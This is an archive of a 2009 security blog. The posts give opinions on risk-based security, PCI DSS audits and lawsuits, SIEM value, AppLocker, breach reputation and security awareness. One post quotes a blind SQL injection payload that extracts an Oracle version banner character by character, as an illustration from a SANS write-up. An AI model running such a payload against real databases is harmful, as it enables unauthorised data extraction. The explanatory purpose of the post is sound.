Friday, December 11, 2009

Shouldn't it be a "security professional friendly" website?

I received an e-mail from (ISC)2 about their new social network website. I tried to use it, but I've got the following message:Sorry, an error has occured.You must be an (ISC)2 member and have JavaScript enabled in order to access the InterSeC Website.Please enable JavaScript in your browser, log back into the Member Website, and try again.OK...is it uncommon to have a security professional browsing with noscript? Thumbs down to (ISC)2...

Friday, November 20, 2009

The security decision making WAVE!

I'm starting a Waveon Google Wave to build a collaboration piece on security decision making. Please sendme your contact if you want to participate.

It starts like this:
 


Security decision making

Dear security friends,

I'mplanning for a long time to work on a paper/presentation about securitydecision making. I was planning to talk with different securityprofessionals to hear about how their decision making process works andwhere it can be improved. But I've just realized that Google Wave isthe perfect tool for a collaboration job like that. I will, of course,provide the proper credits to anyone who contributes. :-)

Well, some classification and and taxonomy first. I think we could try to break decision making in:

-Scope: it can be from a single application to a whole organization. I'mquite sure that the process changes from one to another, so it makessense to consider it.

- Type of decision: what is the goal of the decision? The most common are:

- Trade-offs: the famous control x productivity impact

- Cost: should I take the risk or pay to reduce/eliminate it

- Control Prioritization: among all those security controls, which one should I implement first?

- Risk prioritization: among all those risks, which one should I tackle first?

-Security optimization: considering all the resources available, how todeploy them in a way to maximize security (minimize risk)

- Method:

-Risk measurement: going through the vanilla process of measuringexposure, impact, threat level, likelihood and getting the resultingrisk.

- Qualitative

- Quantitative: ROSI

- Benchmarking: comparing what others are doing under similar situations

- Regulatory/compliance: doing because it is required

-Metric based: this triggers the whole discussion about securitymetrics, what should be measured, how and what are the desirable values.

- Trends:

-There are several issues with the risk assessment methodologies. Idon't like the feeling of "educated guess" from the qualitativeassessments and there are a lot of conceptual failures on theROSI side.Also, the data available is not good enough to generate good impact andlikelihood numbers. Some researchers believe we should generate newmodels to avoid these pitfalls

-Prescriptive standards: apply more prescriptive regulations, such asPCI DSS, to reduce the "interpretation" issues from more flexibleframeworks and methodologies.

So,I'll add people that I think will bring value to this discussion.Please feel free to expand the wave. Let's see where it will take us.

(I'malso don't know how to invite some people that I know is testing Wavebut I'm not seeing in my contact list...how do I do it?)

Some interesting references to consider/read about this subject:

http://infosecblog.antonaylward.com/2009/08/03/re-iso-27001-security-re-significant-impact-calculation-in-business/

http://taosecurity.blogspot.com/2006/06/risk-based-security-is-emperors-new.html

http://chuvakin.blogspot.com/2009/09/donn-parkers-risks-of-risk-based.html

http://chuvakin.blogspot.com/2009/09/is-risk-just-too-risky.html

http://www.bloginfosec.com/2009/09/28/classy-data-pt-3-%E2%80%93-ownership-and-risk/

Friday, October 23, 2009

One of those "quick updates"...

I'm ashamed that my blog has much more of these posts that it should, but yes, this is another one. I'm not posting anything here for some time, life has been a little more demading than usual for other "stuff". My dog is quite sick (that's expected for a 17 year old dog, isn't it?) and almost all "free time" is being spent between taking care of her and doing all "home stuff" that I usually share with my wife, as she is also studying a lot for her college tests. So, once again, I haven't given up on blogging, it's just a silent time for now. I'll be back when things become a little easier on this side.

Friday, September 25, 2009

Am I being contraditory?

I was reading the post that I just published when I noted that the post right before that was complaining about attempts to standardize diversity, the curse of the "best practices". The funny thing is that on the last post I tried to make the case for a big standard, that would probably end up trying to do the same thing I was complaining about on the previous post. Pretty contraditory, isn't it?It is, and I'm trying to see how these two different approaches can co-exist. One option, and can see how cool that could become, is to create that big standard as a framework that would allow different implementations of the same process, but all following specifications for inputs and outputs. That would create a big standard with "sub-standard plugins", suggested implementations for specific processes. Each of those plugins would consider information from those threat modeling components I mentioned before, in a way that you could choose an implementation of a process that is more aligned to your organization profile, technology and characteristics.That would avoid excessive standardization and also ensure that the basic necessary processes are in place. Now the two posts are not that incompatible anymore and I can go to sleep without that bugging me :-)

Risk-less security

I was happy to find Anton Chuvakin's post about the issues of doing security based on risk management a few days ago.  As I said on my twitter, "discussions about decision making (risk based vs. others) is the only thing interesting for me today on the security field". Anton made a very good summary about why we should consider alternatives to risk management and who else is talking about it.Honestly, I remember when I first read that 2006 article from Donn Parker that I was somewhat disapointed by his suggestion of doing things based on compliance. It was the old security sin "checklist based security". All the recent discussions about PCI DSS are great sources of opinions and insights about the subject, and I'm seeing that there's an overall perception from the security industry that it end up being good for security. Is the checklist based security working?If PCI DSS is working, it's certainly not because of those approaching it with a checklist based mind. It is because it is a quite good prescriptive standard. It is clear about what the organizations need to do. But is has limitations.PCI DSS has a very clear goal, to protect card and cardholder data. The standard allows a quick and dirty approach for those that don't want to bother with all those requirements. Reducing scope. Think about all those requirements about wireless networks. You have two choices, doing everything required by the standard or removing that network from the scope. With PCI, as long as you can prove that the cardholder data environment is protected, the rest can be hell, it doesn't matter, you are good to go. Is it wrong? Well, the standard has a clear goal and it makes sense to define the scope around it, but it is kind of naive on assuming that it's possible to isolate network environments inside the same organization without considering that the payment process (that uses card data) is usually very close to other core business processes. So, PCI DSS is a good standard but it is limited for overall information security purposes.With this in mind, one could say that creating a "generic PCI DSS" would be the solution for risk-less security. I think it is part of the solution, for sure. The problem is that the scope for that standard is considerably bigger, in a way that it would have to include some less prescriptive requirements. Is there a way of doing that without creating a new ISO27002? Don't get me wrong, I think ISO27002 is a great standard, but it is so open to interpretation that it can almost any beast can become a certified ISMS. Also, it has on its base the risk management process, that is exactly what we are trying to avoid. The new standard would have to include requirements to solve one of the biggest challenges on information security: prioritization.Prioritization is the achilles heel of any attempt of doing security without risk management. After all, everybody knows that we cannot protect everything and during the long implementation phases the bigger pains need to be addressed first. How can we do that without using that wizardry to "guess-timate risks"?My take is that it should be done based on two sources of information: benchmarking and threat modeling. Threat models can be generated based on geographic aspects, organization and business profiles, technology in use. Threats for banks in the same context (same country, for example) are probably very similar. Organizations using the same basic software package on its workstations will share the same threats for that technology too. We should also consider that a lot of the current threats organizations face are pervasive and ubiquotous, they affect almost any organization out there. Except for very few cases, malware issues are a common problem. Sure, the impact from malware issues will be different for each organization, but it seems to me that those characteristics will probably be those considered for many other threats too. How would an organization "risk-less" work to define its security strategy and the controls to implement? Most important, how it would check its own security status? Is it ok? Should it spend more? What needs to be improved?That's where the fun is. And no, I don't have those answers. But building the processes and tools to do that is definitely the most cool thing to do on this field.

Wednesday, September 9, 2009

Standardizing diversity - does it work?

Probably not enough content for a post, but certainly for a tweet :-)It's common to see on the security standards, frameworks and best practices a lot of "standard" ways of doing things like access control and patch management. The problem is the organizations are extremely different from each other, not only on the technology but also on processes and culture. It's pretty hard to suggest a standard process that will interact with so many different components and expect it to work (and perform) in the same way for all implementations.We should try to avoid standardizing diversity and start selling the basic concepts for each of those processes. Usually, the expected outcome. For Access Control, we should state that the process should provide least privilege, segregation of duties and accountability. For Patch Management, reducing the vulnerability window and "exploitability" of systems.I'm tired of seeing people struggling to fit "best practice processes"  to their organizations (and the other way around) instead of trying to achieve the desirable outcomes. That's a waste of resources and usually puts security directly against productivity.When implementing a security process, think about the desired outcome first. You'll probably find some different ways to get the results, then just get the one that is more aligned to your organization. Remember to document how the new process achieves that, as you probably will not find auditors with this open mind out there. Let they call your process a "compensatory control", as long as it works and does not make everybody nuts :-)

Tuesday, September 8, 2009

Flash updates and firefox

New Firefox versions will warn you when your Flash plugin is out of date.This is a cool idea and will help users that are not aware of the need to update software like Flash and Acrobat Reader. I can also see this as the beginning of a trend to centralize the updating of all the crap we run on the client side. Microsoft (and Mozilla, Apple, Google) already have a very good update system for their software. By opening it to other software vendors via a public API, it could be used as a single source of updates. Adobe, instead of deploying its own update system, could simply publish its updates through Windows update system. To avoid non-authorized updates, the user could be asked for the first time if he wants to allow that organization to update its software through the system, with the identity being verified through digital certificates. That would certainly help users to keep their software updates and to reduce the number of agents checking every time if there are updates to be installed. Please guys, let's simplify this mess.

Thursday, September 3, 2009

New AppLocker from MS - Some improvements

A was reading this article about AppLocker, the application control system from Microsoft that runs on Windows Server 2008R2 and Windows 7 clients. There seems to be some very good improvements there, specially the "automatic rule creation" part.In, short, an organization can build its "gold image" desktop, with all necessary apps, and run the automatic rule creator to identify all the applications that will be on the whitelist of things that can run on the desktop. If you are mature enough to have a real good "gold image", that shouldn't be very hard to do.The issue that I can see is with patches and updates. However, the automatic rule creation can work with the Publisher information when the binaries are signed, making it easier to accept new versions for those files. I think I'll try that in a lab to see how effective that is.Another interesting thing is that you can enable it in a "Audit only" mode. I have a personal view for whitelist based controls that is deploying them to generate logs only and monitor using a SIEM or similar system. On that way the risk to disrupt the environment is reduced and the exception can be managed on two levels (changing the whitelist, ignoring speficic alerts from the controls). It is one of the best ways to do security without breaking everything and also getting more value from a SIEM deployment. Be aware, however, that the SIEM system alone will not perform any miracles, this concept can only work when you have people and processes in place to deal with the generated alerts and to constantly tune the rules. That's the price to pay for more flexible security.

Wednesday, August 26, 2009

Sign Seth Hardy's petition for (ISC)2 Board of Directors ballot

Folks, this is serious and important. A lot of us has several complaints about the way that the CISSP certification is modeled, the quality of the questions and how it is interpreted by the industry. Seth Hardy is asking for support to be included in the (ISC)2 Board of Directors election ballot. He needs 633 signatures on his petition in order to be included. Here are Seth's objectives for joining the Board:

I want to make the certification exams offered by (ISC)2 more respected on a technical level. While I understand that the exams are not focused on technology -- "Security Transcends Technology", even! -- this is not a valid reason for exams that have outdated, misleading, or incorrect material.

I want greater accountability from (ISC)2 to its members. This is focused on (but not limited to) exam procedure and feedback. If there is a problem, it should be acknowledged and addressed in a reasonably transparent manner.

I want the purpose and scope of the (ISC)2 certifications to be well-defined. The CISSP certification is considered the de facto standard for technical security jobs; if it is not designed to do this, there should be clear guidelines from (ISC)2 on where it is appropriate and inappropriate to be gauging the skill and qualifications of a job applicant depending on whether they have the certification.

You can sign his petition at http://sethforisc2board.org/


Media_httpimgzemantac_wmfqv

Friday, August 21, 2009

On the technical details of the breaches

We finally have some information about what really happened on Heartland, Hannaford and 7-Eleven breaches.

Even if the initial SQL injection was in a SSL connection (my assumption is there was no initial reaction due to lack of detection), the rest of the attack should still be easy to detect. What are these companies doing about network security monitoring and intrusion detection? Seems to me that this is a point where current PCI-DSS requirements might not be sufficient. Requirements 10, 11.4 and 11.5 are good candidates to be improved.

Media_httpimgzemantac_gtbtm

Thursday, August 20, 2009

Good risk management leads to Compliance?

This is a quite logical line of thought, but there is one catch. Not all regulations are created in order to reduce risk to the part who is responsible for applying the controls and will go over compliance validation. Think about PCI-DSS compliance by merchants. It tries to reduce risk for card brands, issuers and acquirers by forcing the key point of compromise (merchants) to apply the proper controls. However, the cost for the merchant to apply those controls is higher than the risk reduction he will get. That's why fines are usually established by regulating bodies, to artificially increase the risk to the entity who is responsible for applying the controls. If this "manipulation of risk economy" is not properly done, the "good risk management leads to compliance" concept does not work. 

Media_httpimgzemantac_hqltl

Robert Carr, PCI, QSAs...

I tried to resist posting about this last discussion. For those who are not aware of it, a very quick overview:

  1. Payment processing company (Heartland) had a breach, leaking thousands of credit card information
  2. Heartland's CEO complains that they went through the regular PCI-DSS audit and the QSA had not pointed out the issues related to the breach
  3. Security industry goes mad about his complaints: "compliance is not security", "compliant at that time doesn't mean always compliant", "PCI-DSS is just a set of minimum requirements", the QSA report is just information based on their own honesty, etc, etc, and finally, "he should know all that".
I agree with my peers on almost everything that was said on #3, but I'd like to point to some issues here. First, there is a kind of "cognitive dissonance" about PCI-DSS in our industry. It is sold (not by everybody, I must say) to high level executives as the best thing since sliced bread for breach risk reduction, but when something happens we promptly start saying that it is just an initial step in a longer journey, it is composed only of minimum requirements and so on. Think for a while about all the things you heard people saying while briefing executives about PCI-DSS and trying to get a budget to implement the requirements; have they always made clear all the limitations of PCI in terms of risk reduction?

I'm trying to see this episode with my "CEO glasses". I imagine what I would do if someone would come to me asking for money to implement requirements from a regulation that will do little to reduce my risk; wouldn't it sound to you that the standard is worthless? Also, I need to hire a company, that was trained by the organization who created the standard, to tell me if I'm in compliance with it. Assuming that I did that with the best intentions, provided my CSO with all necessary resources to stay in compliance and not just be in compliance at the audit time, shouldn't I assume that if a breach occurs its valid to verify if the breach occurred because of conditions that should have been identified by the auditors? And, in this case, that they share the responsibility?

I'm not necessarily saying that it is right or wrong, just that it seems very reasonable to me that CEOs would follow this line of thought. To be honest, I'm not the only one thinking like this. This post from the New School of Information Security blog goes along the same way.

Media_httpimgzemantac_wktdd

Friday, August 14, 2009

Don't worry about security reputation IF...

There is a ongoing discussion on some forums about the "fallacy" that the damage to the security reputation of an organization due to a security incident is not as bad as security professionals use to say. This is based on this post from Larry Walsh.
I'm sure there is a lot of exaggeration on the effects of an incident. Some business tend to fell more the effects of an incident than others, for instance. We can tell that the retail business can survive pretty much harmless to an incident, like we saw with TJX and so many others. But what about payment services companies?
The last two examples are really interesting, CardSystems and Heartland. CardSystem is out of business because of its incident. Heartland is surviving, but take a look at their share price:

The effects of the incident (see the that big drop in January?) are clear and it will take time to recover from it. The company is spending a lot of money to rebuild its credibility, there is a real impact to the value of the organization. One can argue the part of the impact is due to the financial risk from litigation and fines, not to reputation only. That's true, but I'm sure that even by not considering that impact we would still see some considerable impact.
The impact can be zero? Yes it can, but it depends on a series of factors, like the organization business, details of the incident (what type of information has leaked, how it happened) and how the organization dealt with it.


Media_httpimgzemantac_taqde






Monday, August 10, 2009

These are the vulnerabilities I'm worried about

For those who are addicted to vulnerability information feeds, you are probably already aware of the XML Libraries data parsing  vulnerabilities. This is the kind of vulnerability that creeps me out. When you've got vulnerabilities related to an easily identifiable software, like "Windows 2008", "Firefox 3.5" or "Java Runtime Environment 6", it is easy to understand if you are vulnerable or not.When the issue is on libraries, libraries that are used everywhere, this thing becomes a nightmare. You are now relying on the ability of all your software providers (COTS software and "tailored" stuff) to identify the usage of those libraries in their products, and also on the ability of your developers to do the same. Does your vulnerability management process includes a procedure to check with developers if they are using vulnerable libraries? Do you track libraries on those processes too? I haven't seen that being done out there.There are lots of file scanning technologies deployed everywhere. Antivirus, content discovery, DLP. Can we leverage those technologies to look for the presence of vulnerable libraries? I wonder if someone is already doing that...
Media_httpimgzemantac_cbwaj

Friday, August 7, 2009

Risk intuition and security awareness

Schneier has posted a very good post on "Risk intuition" and risk perception in general. This part was particularly interesting:

"[...] I listened to yet another conference presenter complaining about security awareness training. He was talking about the difficulty of getting employees at his company to actually follow his security policies: encrypting data on memory sticks, not sharing passwords, not logging in from untrusted wireless networks. "We have to make people understand the risks," he said.

[...]

"Fire someone who breaks security procedure, quickly and publicly," I suggested to the presenter. "That'll increase security awareness faster than any of your posters or lectures or newsletters." If the risks are real, people will get it."

He is totally right about it. Employees perceive very fast the organization posture on its own rules. Everyday decisions are usually based on personal risks, and not on organization related risks. The employee is thinking mostly about the risk to his performance and to his job, not to the company itself. If people starts to be punished for security policy violations, this "personal risk" starts to be considered on decisions like forwarding internal mail to external accounts and sharing passwords.

I had the opportunity to witness the change in people's behaviour because of changes in management posture before. In one of these cases a group of developers used to share passwords among their group to "keep things running while they are away" and were encouraged by their manager to do so. They immediately changed this behaviour as soon as that manager was publicly reprimanded by his director due to promoting bad security practices and warned that it would be formally punished if identified again.

The other case, at the same organization, was related to prohibited content being accessed on the Internet. We didn't have content filtering at that time, but by using some simple Perl scripts and Proxy logs I was able to trigger the process of warning managers of abuse from the biggest offenders. The actions taken by those managers (strongly encouraged by higher management) over those warnings triggered a huge change in behaviour from all users, that could be clearly noted in the next month's logs. People just realized that there was a real risk related to that behaviour, so they changed it. An interest fact about this case was that some users went the other way and started using stuff like proxy websites to avoid the controls. The same mechanism (report of users doing that) that triggered this behaviour was also used to reduce it. Users doing that were punished, and the message that Internet access was being monitored and that attempts to abuse it would be punished was clearly received. 

So, if you want to know what's the best investment on security awareness: real punishment of violations. Change the employee personal risk/reward equation.


Media_httpimgzemantac_firaq

Friday, July 24, 2009

+/- 40% accuracy and we think it's good?

I was caught by surprise when I was reading Matthew Rosenquist post on the IT@Intel blog by this information about the OCTAVE methodology:

"I have observed the accuracy to be +/- 40% in complex organizations.  I believe this is largely due to multiple tiers of qualitative-to-quantitative analysis and the bias introduced at each level.  Credible sources have expressed a better +/- 20% accuracy for smaller implementations."

Even if Matthew is defending the use of the methodology, these are very strong numbers for me. I cannot see how a methodology with this level of accuracy can be much better than some quick and dirty threat and impact assessment, at least for getting support information for a security strategy definition.

I was always a very big fan of risk based methodologies and frameworks like ISO27002. However, they all seem to suffer from a "first steps syndrome", they are extremely hard to be put in motion and it takes a long time before they start to be effective. Eventually, after a couple of years, you'll start to get some good results. But until you get there you're probably exposed and have some serious gaps on your security posture.

This is not just the case of fixing the urgent gaps first and then starting the everything "in the right way". The gap fixing will become a neverending firefighting and will suck time and resources needed for the big stuff. What we need now is a way to reach a desirable end state by a series of actions that will solve immediate issues while staying in the path for that. And how is that possible?

I'm still not sure, but I'm trying to put something together in that way. That would include:

  • More prescriptive directions (like PCI-DSS)
  • Quick and dirty, facts based threat assessment
  • Actions prioritization based on immediate outcome, reach (threats and assets related) and increasing value over time
  • Outcome based metrics


Media_httpimgzemantac_ieqwr

Friday, July 17, 2009

NMAP 5 released

It's kind of stupid to post it in yet another blog, but this will be just a quick note to mention the new NMAP version and also point to a very good post on the SecuriTeam blog about what's new in the new version. A very good summary.

Friday, July 3, 2009

Dunbar's number and security

I've just finished Malcolm Gladwell's book The Tipping Point. As usual, Gladwell's books always bring food for thought on security for me. Security is deeply related to human behaviour, the main subject of his books. The most interesting thing from TP for security is the Dunbar's number. Honestly, when I read about it I thought I've found something like the famous 42, but it was, in fact, some serious and important stuff for our field.

The basic concept on Dunbar's number is that people has a limit for the number of people with whom they can maintain stable social relationships. The actual number, 150, was found in several independent studies, including some new ones about social networking websites like Facebook. The implications of this "hard-coded limit" goes beyond the number of "friends" you can have, as it also relates to the number of people that you can interact while maintaining a personal context, the maximum number of people you can put together as a cohesive group, the list of implications is huge.

It's easy to extrapolate it to security. I can clearly see how it would impact Security Awareness initiatives. It's common to see those initiatives trying to use people as champions for their work groups and departments. The Dunbar's number can be used as rule to define how many champions are necessary and for what groups. It can also be used to define processes around access verification and entitlement review, as we can probably expect that a manager won't be able to effectively answer for "need to know" characteristics of a group bigger than 150 people.

Of course, all these theories need to be tested. However, we must always remember that systems are not only systems to be secured, they have a purpose and they need to perform properly. People are not just "users" they are also human beings. Information is not only data to be protected, it has an infinite range of meanings and context. All research and findings about the Dunbar's number and its applicability into Information Security is just another example of why is so important to security professionals to constantly go through other fields looking for useful information.

Friday, June 19, 2009

SIEM value

There's a lot of interesting discussions about the value of SIEM solutions. There's also some discussions about the possibility of doing that with open source, like OSSIM (I personally think it is possible for some organizations - specially those that have the open source culture already).I like to say that SIEMs are for security what ERP systems are for enterprise management. There is a huge value on deploying those systems, but you need to be aware that the implementation process is not easy, it takes time and requires a lot of commitment from the organization. It's not just "pay software, pay hardware, a bunch of consultants, done". Most of the times you need to create or adapt a lot of process to start working with the new tool. You need to understand the data that you will be working with. Just like for ERPs, when you need to have total control over how your books work in order to automate and improve them, you also need to understand how your network and systems work in order to get any value from SIEMs.IDSes suffered a lot when they were deployed without the necessary services and (right) people to manage and operate them. SIEMs are not different on this aspect, and they may be even more sensitive about it, because they rely on receiving data from lots of different sources. If those who are responsible for those sources are not in the same boat as you and are not aware of the value of the tool, they have the power to make that SIEM a nightmare to manage. In order to get some value from SIEMs, you need to be able to get the data from the systems you identify as necessary and keep that data flowing! How many places you know where the biggest SIEM related activity is troubleshooting why the logs are not coming? If you cannot feed the beast, it won't fly.

Thursday, June 11, 2009

Looking at things through "cloud glasses"

I was happy to see the last posts from Alan Shimel about the incident on LxLabs and what that means to "cloud security". Not only because I think he is right about using it as an example of why we should think about cloud security but also because I like his "anti-hype" posture. Ok, that specific incident may be related only to one of the several aspects that define "the cloud" (according to Hoff, "multi-tenancy" - and the implications are mostly to "public Cloud providers"), but that doesn't mean that it there is no implications on cloud security discussions. And I'll try to go even further on this analysis.

If you look at the incident characteristics it's easy to relate that only to multy-tenancy environments, but this can also be seen as a sign of higher impacts (and rewards to attackers) when leveraging components to multiple users, users being not only multiple organizations but also multiple applications, guest OSes, networks or anything else that can share a common resource base. Sharing an (elastic, on demand, whatever) common resource base is probably one of they concepts of cloud computing, so yes, we should connect that incident to cloud security. It's not a "one to one" relationship, but it makes sense to look into the causes and effects of that fact under "cloud glasses" (WOW, I've just created a cloud-hype-term!). And that's also why I think that Schneier is not completely wrong when he says that we have been there before. We have been sharing computing resources from some time, let's look into the old stuff without prejudice and see what lessons learned at that time can be applied to the new context. I'm sure we can use a few.

Some interesting aspects that can be highlighted from this incident is how the security dependencies can sharply increase when you start to leverage cloud based services. Suddenly, the security of your data starts to depend not only on the security of the software and hardware that you own, but also on the security of software and hardware of the several service providers that are part of that offering. So, you are using Saas from X? Ok, and they are running their application over PaaS from Y, who operates over IaaS from Z. You are seeing X, but your security now depends on X, Y and Z. How can we do risk assessment for that?  I'm not saying that it's god or bad, just that it has interesting implications about risk management and trust.

Yes Alan, cloud security matters and LxLabs is a very good example to use.

Friday, June 5, 2009

Sueing the auditor? Sure!

The PCI-DSS world has just gone mad this week after Merrick Bank decided to sue Savvis, who gave a clean bill to the well known service provider CardSystems, responsible for a huge breach that lead to thousands of card numbers being stolen.It is an interesting outcome and raises a series of questions about whether it's valid/reasonable to sue an auditor after a breach. Some PCI specialists promptly said it should not happen, as the auditor report is related only to a specific point in time and cannot be taken as a guarantee that nothing will happen on that environment. However, I believe that there are situations that could lead to a lawsuit like that.If the breach happened through something that goes against a PCI requirement and it was there at the time of the audit, it was probably something that should have been identified by the auditors, so they screwed up.- "please show me where I'm screwing up"- "don't worry you are ok, go for it!"...something happens...you've just opened a can of worms!Can you show that it was something that the auditors should have found? Was it there at that time? Have you answered properly all questions?There are other interesting situations - things tested by sampling, incorrect scope definitions, among others.PCI is suffering from the same pain that SOX suffers...but it will be easier to deal with as it is more prescriptive. Auditors now need to be even more careful about their methodologies - are they doing sampling properly? Are they being careful about the definition of the audit scope? Are they properly registering the answers provided by the auditedorganization? That's how they need to work to protect theirselves from being sued by compromised clients. That and raising their prices to build a reserve for eventual legal expenses. One can expect PCI audits to become more expensiveif the trend is confirmed.An interesting outcome is that for companies being audited, this is an additional reason to be completely transparent during a PCI audit. If you have the option to sue the auditor later, you should do everything to ensure that they won't miss anything because of your actions and answers, as this would release them from the liability.Also, another player will become extremely important, the forensics guy. He'll be the one that will have to go through all the evidence from the breach investigation and from the audit process to check whether it's case for a lawsuit.Auditors trying to protect theirselves by being more efficient, audited companies protecting theirselves by being more transparent. Bad auditors paying for their incompetence. Aren't these good reasons to allow those lawsuits to happen?

Wednesday, May 20, 2009

Risk assessment science

I agree with Ben Tomhave on this particular subject. He is basically saying that we still don't have a good solution for reliable and repeatable risk assessments. I must say that this is not true to smaller scopes, like a single application or a small network or system. However, when we start talking about a risk assessment for an entire organization, I really don't trust the results.

A lot of people will say that this is not true, as they've already completed successfully several assessments. For those I would ask, do you think that just by delivering a methodology you can ensure that the results would be the same for any other (competent) security professional? Until we can answer that with a sounding "YES", I don't think we've developed a good enough methodology for risk assessments. In short, I want to see a methodology that brings results that can used to:

  • Compare the risk from different organizations (benchmarking!)
  • Compare the risk for the same organization in different points of time
  • Identify a comfortable level of risk that will be pursued by the implementation of security measures
  • Identify the results of applying security measures (answering the basic question, "was it helpful/worth doing?")
  • Compare the risk from two or more different business processes, components or approaches
  • Protect against "black swans" (this one is extremely hard)
It should also:
  • Include "blind spots" from the organization into the risk calculation
  • Consider the interdependency of different business and technology processes and components (how much risk are your production systems inheriting from your development systems?)
  • Be resilient to the fact that almost all medium/big organizations have very high levels of uncertainty on the different variables usually necessary for a meaningful risk calculation
That's not easy and most of the current methodologies cannot address all these issues. That's the fun part in our job today, we need to find how to do it.

Tuesday, May 19, 2009

Helpdesk, a very good start to shape your mindset

I agree with Andrew Hay here:

Should the Helpdesk be a Mandatory Start for an IT Career?




Foranyone who has worked in a “front line” customer facing telephonesupport role, the answer is almost always am emphatic “YES”. I tend toagree with my colleagues for one simple reason - embitterment helps you succeed.

Why do I think IT folks need to have a sprinkle of bitterness be inthis field? The fact is that IT, like roadkill removal, is truly athankless job. Sure, guidance counselors, parents, and the media willall tell you that “Computers are the way to go” for a good salary,benefits, and career advancement. The problem with that mentality isthat it’s not the mid-1980’s anymore. More and more jobs are beingmoved to parts of the world where wages are lower and, to be perfectlyfrank, people are willing to do the crappy jobs that North Americansthink are beneath them.

To be clear, I’m not saying that working in IT is the hardest, orworst, job around. IT workers are taken for granted, much like theaforementioned roadkill removal worker. Most people enjoy driving towork on a road free from dead animals. When an animal gets run over andleft for dead, the roadkill removal person is dispatched to “dispose”of the remains. When was the last time you sent a “thank you” card toyour roadkill removal person? To that end, when was the last time yousent a “thank you” card to a member of your IT department? Show ofhands?

Now let’s jump back to my original topic with a metaphor: an ITcareer is like a human body and, in order for your career to live along and healthy life, you need a nice thick layer of skin to protectyou from infection. The “infection” in this metaphor referrers to theemotional challenges that every IT professional experiences duringtheir career. In order for IT personnel to adequately quote with thecritical thinking required to overcome most IT related challenges, a“thick skin” is a requirement — one that I believe should show up onmost job postings.

Working on the front lines of an IT organization let’s youexperience what it’s like to sympathize, and empathize, with those whoare having the problems. It lets you develop valuable customer serviceand communications skills while you work towards making the customerhappy. Along the way you’ll have numerous bad experiences which willserve as lessons that you can use to make yourself a better person.

No matter what role you hold within an organization, you havecustomers to answer to. This is something that working the front linesforces you to remember. Good or bad, working in the trenches teachesyou valuable life lessons that will only help you grow as an ITprofessional.







The help desk is the best place to see how those incredibly nice projects fail, cause problems or are twisted to be used for different purposes (and bringing different risks). Working there for some time will help to create that "wait a minute, this will cause issues" mindset that is so valuable for the security professional.

Blind SQL Injection, or passing the elephant through the needle hole

This SANS Diary entry from Bojan Zdrnja is a very good explanation about how an apparently non-exploitable SQL Injection condition can be used to get important information from the database. Just by looking at one of the sample injected SQL statements you can see how complex a SQL Injection attack can be:

event = tr' || (select casewhen substr(banner, 1, 1) = 'A' then 'u' else 'X' end from (selectbanner from v$version where banner like '%Oracle%')) || 'e

Read the full story here.

Monday, May 11, 2009

Very good PCI resource

Trying to be compliant PCI is a tough task. One of the biggest problems is to find good answers to common questions, as the "PCI specialists" are usually very evasive and will hardly give you a definitive answer. So, it's extremely valuable when someone posts a set of common Q&A about the subject like this one from Anton Chuvakin. If you are struggling with PCI, you will find a lot of good information there. Below are some of the most common I've seen, with the responses from the "PCI DSS Myths and Misconceptions webinar":

Q: What about the organization that says "but we use authorize.net, PayPal, Google Checkout (or whoever) to process our card payments for items we sell on the web. We don't ever handle the card data ourselves, so we don't need to worry about PCI...do we?"

A: Indeed, outsourcing credit card data processing is a very good way of reducing the scope of your PCI compliant environment. However , it is not the same as “outsourcing PCI DSS” since it does not completely shield you from PCI DSS requirements. “Scope reduction” is NOT “PCI elimination.” There are still areas where you must make an effort to comply. However, PCI Qualified Security Assessor (QSA) is the authorized source of this information.

Q: Is a QSA the only authorized entity to run a scan or can I as the owner of our business run the scan myself?

A: This is a pure misconception; 100% false. As per PCI DSS requirement 11.2, an approved scanning vendor (PCI ASV vendor) must be used for external (=Internet-visible) scanning. Internal scanning can be performed by yourself or anybody else skilled in using a vulnerability scanner.

Q: Do we need to ensure that our third party fulfillment company is PCI DSS compliant as well (especially if they are taking credit card numbers for our customers)?

A: It is hard to say how the contracts are written in such case, but often the answer is indeed “yes.” Moreover, if they take credit cards they need to be compliant and protect the data regardless of their relationship with you. PCI QSA is the authorized source of this information.

Q: Is a fax with credit card information that arrives to organization’s fax server considered to be a digital copy of this data?

A: A digital fax containing a credit card number is likely in scope for PCI DSS. There is some debate about the “pre-authorization data”, but protecting credit card information applies to all types of information: print, files, databases, fax, email, logs, etc.

Q: For a small merchant that only processes a handful of transactions a month, are there alternatives to some of the expensive technology requirements (e.g. application firewalls, independent web/db servers, etc)?

A: Outsourcing credit card transactions is likely the right answer in such circumstances.

Media_httpimgzemantac_mzhcf

Friday, May 8, 2009

Wireshark and SSL connections

I'm maybe a little (a lot?) late on this, but I was reading this nice description of a packet capture analysis from the SANS forensics blog and just found that Wireshark can read SSL encrypted connections if you provide the private key! This is really nice ans useful. Here is a screenshot (also from SANS post) with the screen where you can indicate the private key to be used:

Friday, May 1, 2009

Numbers, numbers, numbers

The last Verizon reports brought a lot of very good numbers to the Information Security space, so much in need for reliable data.  There is always the risk of people using numbers in a wrong way, falling into the famous "base rate fallacy" class of mistakes.Check Pete Lindstrom comments on it, they perfectly illustrate how easy is to get wrong conclusions from those numbers. For me it's just another reason to believe that risk calculations are not as useful as we believe.

Thursday, April 30, 2009

It's a rant, but it so good

It was written some weeks ago by Stuart King. I love it. Two key points for me:"Many "experts" preach the importance of working through risk models. It's a load of tosh. No matter which way you try to do it, you'll always come out with the answer you first thought of.  You might as well use a crystal ball and read tarot cards""A network scan report is given to a newly CISSP qualified security analyst and he's asked to review it as part of a job interview. He spots the obvious highlighted security holes but doesn't question why a web server has non-standard ports open. Are we becoming too reliant on auto-scan reports? Security analysts need to be inquisitive, well practiced in basic technical skills, able to spot anomolies, and not afraid to question things that don't look right. The scan results never tell the full story!"

Where is security heading to?

